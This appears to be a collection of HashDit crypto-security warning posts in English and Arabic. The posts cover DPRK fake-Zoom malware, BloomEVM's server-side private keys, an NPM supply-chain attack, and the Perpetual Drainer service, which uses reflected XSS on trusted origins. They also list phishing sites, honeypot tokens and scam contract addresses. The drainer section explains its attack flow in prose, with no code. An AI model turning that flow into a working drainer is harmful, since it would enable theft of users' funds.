HashDit

We have observed this occurring repeatedly in recent crypto security incidents (olaxbt & venus whale user). It will persist if we, as a crypto community, are not well informed! 😭
DPRK threat actors 🤖 continue to exploit this attack vector because many projects mistakenly believe their macOS systems are inherently more secure and remain unaware of sophisticated Zoom scams involving fake telecommunication devices. It is crucial for organizations to stay security-aware and vigilant.

"According to reports, DPRK threat actors stole a total of $1.5 billion USD in cryptocurrency during the first half of 2025."

These are the few RED flags 🚩 you should notice:
1. Received an unexpected DM from an account, asking for a meeting call, especially on Telegram?
2. Account that reached out is acting differently? Or he has a different TG handle?
3. Prompted to download or run any security update or fix to the "Zoom" software link that they forwarded?
4. Inconsistencies with voice/visual/lighting with the person(s) during the meeting call?
It's time to CHANGE the mental model that macOS is inherently safer; it can also be targeted by malware.
Think you might have been targeted or have any other questions? Reach out to us now so we can assist!!
Stay safe out there!
#DPRK #Crypto #Security #Malware

إخلاء المسؤولية
البيانات المالية المقدمة هنا دقيقة بناءً على نظام المراقبة الخاص بنا وبناءً على مبلغ $USD للعملة المشفرة المعنية في وقت الحادث. نظرًا لطبيعة تقلب الأسعار للعملات المشفرة، قد يختلف إجمالي الخسارة مع التقييمات الحالية للتوكن.
علاوة على ذلك، قد لا تعكس البيانات المالية بالكامل "المبلغ المستغل" الحقيقي للحادث. وهذا ينطبق بشكل خاص على عمليات الاحتيال حيث يتم عادةً خلط المبلغ الإجمالي المسروق مع مبلغ أساسي أولي تم حقنه من قبل طرف مشروع الاحتيال.

It began like any other late night crypto experiment. A trader, eager to catch the next memecoin wave, opened Telegram, searched for BloomEVM (@BloomTrading), and followed the bot’s instructions: “Create your wallet. Paste your token address. Let automation do the rest.”
Within seconds, the bot was trading: fast, smooth, and efficient. But behind that convenience hid a silent danger associated with centralized storage of your private keys.
The Promise of a Telegram Trading Bot
Telegram trading bots like BloomEVM promise to simplify crypto trading. They let users create or import wallets directly in Telegram, paste token addresses, and automate trades across chains. Everything happens within a friendly chat window, no coding or wallet plugins required.
Following the Data
To understand what really happens behind the screen, we traced BloomEVM’s network traffic. The moment a user clicked Create Wallet, a series of HTTP requests lit up. We can see requests not from the user’s device to the blockchain, but between Telegram’s web client and Bloom’s backend servers.
The discovery was unsettling:
Wallets weren’t being generated locally.The private keys were created on Bloom’s servers and sent back to the user.When importing an existing wallet, private keys were transmitted to the same backend. In other words, BloomEVM had full visibility and control over users’ keys, despite publicly claiming that “Bloom will not store or retrieve your private key.”
The illusion of self-custody shattered.
The Technical Proof
Our analysts captured the key creation flow in detail. In the captured network requests, the backend responded with both the wallet address and its private key (see Fig. 1).

Fig. 1. The created private key is sent to user’s frontend and can be directly captured.
Contrary to Bloom’s documentation, the private key never resided solely in the user’s Telegram frontend. Instead, it lived on Bloom’s servers, accessible to anyone controlling that infrastructure.
This design wasn’t just a poor practice; it was a fundamental violation of self-custody principles. Even worse, the bot could execute transactions directly on behalf of users without requiring on-chain approvals. This is actually a delegation of full authority.
When Things Went Wrong
The risks weren’t theoretical.
In January 2025, a Solana user lost 1,068 SOL (≈ $2.1 million) in transaction fees after a trade routed through the Bloom Router. Community members debated whether the loss was due to a manual fee error or a bot side vulnerability. Bloom never issued a formal response. And Bloom wasn’t alone. The history of Telegram trading bots is littered with similar incidents:
Banana Gun (Sept 2023): $3 million drained from 11 users via unauthorized wallet access.Maestro (Oct 2023): 280 ETH stolen after a smart contract flaw.Unibot (Oct 2023): $640k lost in a router contract exploit.
Each story told the same cautionary tale: convenience came at the price of control.
Why This Matters
Telegram bots blur the boundary between social app and financial terminal. Unlike decentralized applications, they operate through centralized servers. A single compromised backend could endanger thousands of users’ wallets overnight. Yet, for many casual traders, that risk remains invisible behind the sleek chat interface.
What You Can Do
If you still choose to experiment with Telegram bots, treat them as untrusted intermediaries, not self-custodial tools. Security best practices include:
Use a temporary wallet. Never connect your main wallet.Limit your funds. Only deposit what you can afford to lose.Withdraw profits quickly. Move them to a cold or main wallet.Revoke token approvals when done.Monitor wallet activity regularly through explorers.
These aren’t guarantees, but they’re your last defense against silent custody failures.
The Takeaway
The rise of Telegram trading bots like BloomEVM reflects a deeper trend: traders want simplicity. But when simplicity hides centralization, the convenience becomes an illusion of control. Our investigation reminds us that in crypto, custody equals trust, and trust, once misplaced, is impossible to reclaim.

في الأسبوع الماضي فقط، لاحظنا هجومًا حديثًا على سلسلة التوريد يؤثر على مليارات التنزيلات على NPM، مما يؤثر على العشرات من الحزم المستخدمة على نطاق واسع مثل chalk وstrip-ansi وcolor-convert. يمكن العثور على مزيد من التفاصيل هنا:
https://jdstaerk.substack.com/p/we-just-found-malicious-code-in-the
في هذا الهجوم، يستهدف المهاجمون رموز GitHub وبيانات الاعتماد، في محاولة لاختراق تدفقات عمل GitHub Actions.
الإجراءات الموصى بها:
قم بتدقيق تبعيات مشروعك على الفور لأي حزم متأثرة.

🚨 Hashdit Warning! 🚨
Scammers are planting trojans in apps downloaded to your iOS and Android devices. These can scan for images of cryptocurrency passwords or wallet seed phrases. Stay safe!
🔑 Key Lessons:
1. Download only from legitimate app stores (iOS Store or Google Play).
2. Ensure apps are from reputable developers.
3. Limit app permissions (e.g., restrict access to your image gallery).
Stay vigilant and protect your digital assets! 💪

Introduction
HashDit has monitored a new Drainer As A Service (DaaS) product in the Crypto Scam industry, which calls themselves Perpetual Drainer.
Instead of the traditional way of tricking a victim to visit a scam / impersonation website where security tools can block these sites on the wallet level, the victim visits a website hosting Perpetual Drainer, where the wallet now will receive a request from a trusted origin bypassing checks.
Modus operandi
Perpetual Drainer will redirect victims to a reflected XSS exploit on a trusted origin, which then dynamically loads a script from Perpetual Drainer infrastructure that contains the actual drainer logic.
When this code executes, it rewrites the DOM to display a wallet connection prompt and causes all requests to the wallet extension to originate from the trusted origin, rather than the malicious origin. 
Technical Details
Affiliates: These are individuals or entities that help distribute the malicious tool.
Main.js Script: Affiliates can include this script on their websites. When a user visits the site, this script will automatically load another script from a specific URL.
This immediately redirects users to a site with a Cross-Site Scripting (XSS) vulnerability.
XSS Domain: This is a domain that might appear trustworthy, The XSS vulnerability allows the attacker to execute malicious scripts on the user's browser.
Drainer.js: Once the user is redirected to the XSS domain, this script (drainer.js) is loaded from another URL. This script is the actual malicious code that performs the harmful actions.
** It is important to note here that transaction simulation or transaction data analysis can still flag this malicious transaction out.
As always, stay paranoid and review your transactions before signing . If in doubt, always check with a trusted source.
Protect yourself with our HashDit tool 🤖 download now for free!

✍️ Our 2025 Q1 Incident Report for BNB Chain has been published!
1️⃣ Q1 sees a 75% decrease in fiat losses and 31% drop in incident count compared to 2024 Q4. 🛡️
2️⃣ BSC ranks 5th in Q1 fiat losses among other chains. 🤝
3️⃣ Hot Wallet Compromises and Lack of Validation bugs were the most substantial exploits, with CEXs being the most targeted. 🐛
Read the full report here👇
https://hashdit.github.io/hashdit/blog/bsc-2025-quarter-one-report/

So, what is a HoneyPot Token?
A HoneyPot token lures users with the promise of profits, but prevents them from selling their tokens later.
🎯 Usual Targets
General Crypto Users: Little to no experience, follow influencers or pump groups, fall for marketing techniques, or buy fake tokens.Meme Coin Traders: Think they can make quick profits and get out fast despite suspicious aspects.
Did you know? 💡Over 5,000 HoneyPots have been created this year alone! 🤯
💸 Why Users Buy
Desire to make money fastBelief in getting in earlyOverconfidence in outsmarting the systemRushed decisions due to false urgency

FOMOing into a random Pump Signal token will get you REKT
🔍 How to Spot a HoneyPot Token
From the Chart,
Mostly Green candlesticks with the occasional Red
From the Code,
Unverified contractsOwnership not renounced or other privileged roles still controlled by scammersBlacklisting/WhitelistingHigh sell feesRestricted transfersBalance manipulation to prevent selling
From Social Media:
Check with other holders if they have issues selling (verify if they are real users)Verify the official token address
Once you have bought into a HoneyPot, there is NO way you can recover back your funds❗ Anyone guaranteeing you that they can, is a SCAM.
From Wallet:
Randomly airdropped tokens with seemingly real names and value (there is NO free money in this world)
From Transactions:
Multiple failed transactions (check chain explorers like Bscscan)Predominantly buy transactions
From Holders:
Large percentage of tokens held by few addressesCEX holders to mislead about listings (especially if it's a newly launched token)Unlocked liquidity (scammers can pull the rug anytime)
🛡️ How Users Can Protect ThemselvesAvoid impulsive investmentsVerify token address authenticityConduct thorough due diligence (website, team, roadmap)Use security platforms like HashDit + Honeypot.is to verify Code risk
🚨 If Caught in a HoneyPot Token, What should you do?
It is unfortunate but accept the loss and move onReport the contract on platforms like Token Sniffer and RugDocWarn the community to break scammers' reliance on silenceRevoke approvals to safeguard your wallet
Stay vigilant and protect your investments! 💵

ملخص: كن دائمًا حذرًا من المواقع التي تقدم رموزًا مجانية كإير دروب أو رموزًا مجانية تُرسل إلى حسابك عبر إير دروب وتطلب منك الذهاب إلى موقع على الإنترنت للمطالبة بها. لقد رأينا مؤخرًا الموقع 'claimusdtbox' يتصدر التفاعل بين الأعضاء.
نصيحتنا: ابتعد! إنها موقع تصيد يهدف إلى حرمانك من أموالك عبر عقود احتيالية ووظائف خادعة.
احفظ أموالك بأمان عن طريق حماية محفظتك مع إضافة HashDit لمتصفح كروم!!
[https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]

لاحظ فريق HashDit أن موقع الويب الجديد "ksc rocks" يشهد ارتفاعًا سريعًا في التفاعلات.
نصيحتنا: ابتعد عن هذا الموقع! يبدو أنه عبارة عن عملية احتيال وهمية تنتحل شخصية موقع استثماري وتجاري بهدف حرمانك من أموالك.
حافظ على أموالك آمنة من خلال حماية محفظتك باستخدام ملحق HashDit Chrome !!
[https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]
#TrendingTopic #BTC #ETH #memecoin🚀🚀🚀
فيما يتعلق بالحقائق:
لا يقدم الموقع أي معلومات حول المشروع.

لاحظ فريق HashDit أن موقع "eth-am.com" يتجه نحو الأعلى في تفاعلات الأعضاء. قم دائمًا بالعناية الواجبة قبل التعامل مع مواقع الاستثمار السريع.
نصيحتنا: ابق بعيدا! إنه موقع ويب للتصيد الاحتيالي يهدف إلى حرمانك من أموالك عن طريق التصيد الاحتيالي للموافقة.
كيف يعمل هذا التصيد:
تم إعداد الموقع ليبدو وكأنه منصة تداول آلية ممزوجة بجانب التوقيع المساحي. 
بمجرد وصولك إلى الصفحة، تطلب تلقائيًا الاتصال بالمحفظة.
يؤدي النقر فوق كلمة "فتح" أو التفاعل مع صفحة التداول المفترضة إلى تشغيل عملية التصيد الاحتيالي. 

قم دائمًا بالعناية الواجبة قبل التفاعل مع أي موقع يدعي أنه يسمح لك بتحقيق دخل سلبي/نشط بسهولة. لقد شهدنا زيادة في التفاعل مع موقع التصيد الاحتيالي "defiminingfarm".
نصيحتنا: ابق بعيدا! إنه موقع ويب للتصيد الاحتيالي يهدف إلى حرمانك من أموالك عن طريق التصيد الاحتيالي للموافقة.
#TrendingTopic #BTC #ETH #memecoin🚀🚀🚀
كيف يعمل هذا التصيد:
تم إعداد الموقع ليبدو وكأنه منصة تعدين نشطة عالميًا. 

إنهم يزعمون كذباً أنهم شركاء مع مواقع مثل CMC وcoinGecko وما إلى ذلك.يطلب الموقع تلقائيًا اتصال المحفظة بمجرد تحميل الصفحة.

شهد موقع الويب الجديد "mtcfund.io" ارتفاعًا في التفاعلات. 
نصيحتنا: ابق بعيدا! يبدو أنها عملية احتيال استثمارية زائفة تتظاهر بأنها موقع إلكتروني يهدف إلى حرمانك من أموالك.
حافظ على أمان أموالك من خلال حماية محفظتك باستخدام ملحق HashDit Chrome!!
[https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]
#TrendingTopic #BTC #ETH #memecoin🚀🚀🚀
فيما يتعلق بالحقائق: 
الموقع مصمم بشكل سيء ولا يعمل أي من الروابط فعليًا.
لا يقدمون أي معلومات حول الفريق أو أي وثائق تتعلق بالمشروع.

لاحظ فريق HashDit موقعًا "zedxion.site" يهدف إلى التصيد الاحتيالي للمستخدمين من خلال الادعاء بأنه رمز مميز لمعجبي ما قبل البيع لـ "Chiliz Labs".
نصيحتنا: ابق بعيدا! إنها عملية احتيال تصيدية!!!  
عقد احتيال [BSCScan]: 0x2a68Ef2850300e42dC2E7733a489C6f1aFFc3d1A
نقترح استخدام ملحق HashDit Chrome لحماية محفظتك.
[https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]

#TrendingTopic #BTC #ETH #Presale #memecoin🚀🚀🚀 الأعلام الحمراء: تم إعداد الموقع بشكل سيء، ليبدو وكأنه بيع مسبق لرمز مميز جديد. 

HashDit team noticed that a few new websites “spccoin.in”,”spctoken.in” have been seeing a rise in interactions. 
Our Advice: Stay Away! It's a Fake Investment Scam posing as a staking website aiming to deprive you of your funds.Keep your funds safe by protecting your wallet with the HashDit Chrome Extension!![https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]
#BTC #ETH #TrendingTopic #memecoin🚀🚀🚀
Concerning Facts: 
They claim to be a token designed to offer various payment services for SPC ecosystem projects.They claim to provide two platforms to earn unlimited amounts.
Red Flags:
To sign up you need to pay an activation fee [10 - 50 usdt].Once you sign up they promise you multiple sources of income.Direct Income: 5-10% your direct referrals activation fee.Level Income: requires a minimum of a 30, upto 50 usdt activation.They also promise a direct sponsor bonus of 10% with upto 16 levels of referral.They round it off, they promise a staking bonus of .30% - .60%.This scheme is built up around referring new members and having them purchase memberships.As soon as members stop joining or existing members stop funding the scheme it will fall apart. 
This is the hallmark of all ponzi scams, promising very high returns but never actually providing any to anyone other than themselves.

Always #DYOR! Do not buy into projects that seem to promise unbelievable rewards!!

Always do your due diligence before interacting with sites claiming to offer airdrops of new tokens. We recently received a report regarding “base-brett.xyz” claiming to be the original and then actually stealing user funds. 
Our Advice: Stay Away! It's a Phishing website aiming to deprive you of your funds via approval phishing.Keep your funds safe by protecting your wallet with the HashDit Chrome Extension!![https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]
#BTC #TrendingTopic #ETH #memecoin🚀🚀🚀
How this phish works:
The site is set up to look like the original and offers tokens presale/airdrops. Clicking on the claim rewards button launches a connect wallet dialogue.The site then asks to sign an approval with the spender being a contract. The scammer then makes a ‘multicall’ to the contract resulting in a transfer from function from the victims address to the destination address(es) dictated by the scammer. This then leads to a loss of all tokens in the victim's wallet. 
Contract: https://etherscan.io/address/0x0f2fcdb446FB157A684F51a970Dd88CEf6430B71
Eg tx : https://etherscan.io/tx/0xadf9684612d3dd0b3aaaedb9dd470076fc47437dff954333991c81b7d19d81b6

Always #DYOR! Do not buy into projects that seem to promise unbelievable rewards!!

لاحظ فريق HashDit سلسلة من المواقع المزيفة "allocation-hamster.com"، وciaim-hamsterkombat.com، و"claimhamster.pages.dev" والتي تهدف إلى التصيد الاحتيالي للمستخدمين من خلال استهداف مشروع شعبي جديد "Hamster Kombat". 
نصيحتنا: ابق بعيدا! إنها عملية احتيال تصيدية!!!  
روابط وسائل التواصل الاجتماعي الفعلية:
الموقع: hamsterkombat.io
تويتر/X: @hamster_kombat
برقية: t.me/hamster_kombatنقترح استخدام ملحق HashDit Chrome لحماية محفظتك.[https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]

TLDR: احذر من المواقع التي تدعي أنها تقوم بإسقاط الرموز الجديدة من الجو. لقد تلقينا مؤخرًا تقريرًا بخصوص "basedbrett.claims" و"scotty-theai-io.web.app" اللذين يقدمان عمليات إسقاط جوي ومطالبات ولكنهما في الواقع يسرقان أموال المستخدمين.  
نصيحتنا: ابق بعيدا! هذه هي مواقع التصيد الاحتيالي التي تهدف إلى حرمانك من أموالك. 
العقد المزيف [BscScan]: 0x0000d169F98E078B60bFb09A69D145e72dBE0000
حافظ على أمان أموالك من خلال حماية محفظتك باستخدام ملحق HashDit Chrome!!
[https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]

TLDR: تتزايد عمليات انتحال الرمز المميز لمشاريع التسلق الشهيرة والسريعة وقد شهدنا عقدًا ينتحل شخصية Notcoin التي تم إطلاقها مؤخرًا واستخدام تطبيقات الوسائط الاجتماعية لخداع المستخدمين لشرائها عبر pancakeswap. 
الرمز المزيف (Notcoin - BSCSCAN): 0xc71f74b62d827638513d4eb90021527eed2c622c
/ 0x6f24daa874e65ab70b25bbb4f1fe8f4398ab893a
نصيحتنا: إنها عملية احتيال! دائما ديور. هذا العقد سوف يسرق أموالك. 
نقترح استخدام ملحق HashDit Chrome لحماية محفظتك.
[https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]